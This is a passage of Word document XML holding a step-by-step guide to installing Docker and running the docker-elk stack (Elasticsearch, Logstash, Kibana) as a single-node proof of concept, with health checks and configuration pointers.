      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>deviantony</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>/docker-elk starter. It bundles Elasticsearch, Logstash, Kibana and useful config for a POC. I’ll show the exact commands and the key config you should change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5628D420" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00000000" w:rsidP="00DA611A">
      <w:r>
        <w:pict w14:anchorId="7494B763">
          <v:rect id="_x0000_i1041" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="775EAD22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2.0 Prerequisites (before starting)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0624E592" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">You completed Step 1 (VM created, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>vm.max_map_count</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> set).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5087BB06" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">ELK host VM: Ubuntu 22.04 (or similar) with </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>≥8 GB RAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> for comfortable single-node POC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021EBCBC" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Docker &amp; Docker Compose installed on ELK host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703B2CD2" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>If Docker/Compose are not installed, install them first:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29335ACC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Install Docker (Ubuntu example)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322EFAE2" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t># Update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5B8179" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> apt update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0482E2D7" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> apt install -y ca-certificates curl </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>gnupg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>lsb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>-release</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C450A74" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A"/>
    <w:p w14:paraId="6FAECE64" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t># Add Docker’s GPG key and repo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2030D2C2" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>curl -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>fsSL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> https://download.docker.com/linux/ubuntu/gpg | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>gpg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>dearmor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> -o /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>/share/keyrings/docker-archive-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>keyring.gpg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0C121CD8" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>echo \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE93F12" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">  "deb [arch=$(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>dpkg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> --print-architecture) signed-by=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>/share/keyrings/docker-archive-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>keyring.gpg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>] https://download.docker.com/linux/ubuntu \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68255CA5" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">  $(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>lsb_release</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> -cs) stable" | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> tee /etc/apt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>sources.list.d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>docker.list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> &gt; /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C600E3D" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A"/>
    <w:p w14:paraId="0C0F345F" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t># Install Docker Engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E58DDE1" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> apt update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7244D182" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> apt install -y docker-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>ce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> docker-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>ce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>-cli containerd.io</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55266116" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A"/>
    <w:p w14:paraId="3C676262" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t># Add current user to docker group (logout/login needed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653617D3" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>usermod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>aG</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> docker $USER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673CEBC4" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>Docs: https://docs.docker.com/engine/install/ubuntu/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272DB08C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Install Docker Compose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDAA561" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t># Modern Docker Compose (plugin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45074EC2" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> apt update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44653E1F" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> apt install -y docker-compose-plugin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0CF656" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A"/>
    <w:p w14:paraId="3B534198" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t># Verify</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040843E8" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>docker compose version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C21CD09" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>Docs: https://docs.docker.com/compose/install/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C39D1F" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>If you prefer classic docker-compose binary, follow docs — but the plugin is fine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366F99B6" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00000000" w:rsidP="00DA611A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="084C3FA3">
          <v:rect id="_x0000_i1042" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7268A0B9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2.1 Option A — Quick Docker Compose (recommended for POC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EACF98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2.1.1 Get the repo and start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752AD3C1" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t># On ELK host VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070A95A4" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>cd ~</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1B783D" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>git clone https://github.com/deviantony/docker-elk.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E096D4" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>cd docker-elk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3706EE40" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">Open the .env file and review environment variables (default passwords etc.). </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Do not commit .env to public repo.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> You can change ELASTIC_PASSWORD and KIBANA_PASSWORD if you want.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEEDFAC" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>Start the stack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A079BD5" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>docker compose up -d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F205C3" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>This pulls images and starts containers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD3B2F9" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>elasticsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5785EFF2" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>kibana</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4852F506" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="318EC66A" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> (in some variants)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5EA52D" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>optionally, other helpers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F392ED" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> First startup can take several minutes while images download.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1558774D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2.1.2 Verify containers are running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE57958" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">docker compose </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="676D23E5" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t># or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6106FD01" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">docker </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> --format "table {{.Names}}\t{{.Status}}\t{{.Ports}}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6424F005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2.1.3 Check Elasticsearch health</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7818D5CA" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t># Replace ELASTIC_PASSWORD if you changed it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCEAEC0" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">curl -u </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>elastic:changeme</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> -k https://localhost:9200/_cluster/health?pretty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7312EC11" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>Response should show "status" : "green" or "yellow" (green is ideal; yellow is okay for single-node indices).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F72CCE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2.1.4 Open Kibana</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207EB294" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>In browser on ELK host (or via SSH tunnel): http://&lt;ELK_HOST_IP&gt;:5601</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3795A624" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Login with elastic / your ELASTIC_PASSWORD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03138CC5" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>If Kibana fails to load, check logs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200C254E" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">docker compose logs </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>kibana</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> --tail 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFFDC9C" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">docker compose logs </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>elasticsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> --tail 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBF0AC9" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common fix:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> Increase VM resources; Elasticsearch fails to allocate if low RAM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120DB11E" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00000000" w:rsidP="00DA611A">
      <w:r>
        <w:pict w14:anchorId="70320EA1">
          <v:rect id="_x0000_i1043" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3250752F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2.2 Key configuration files &amp; what to change</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AC6922" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>Open docker-elk folder — important files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184A2E1F" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>.env — passwords and exposed ports. Set ELASTIC_PASSWORD strong value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D81CE5" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
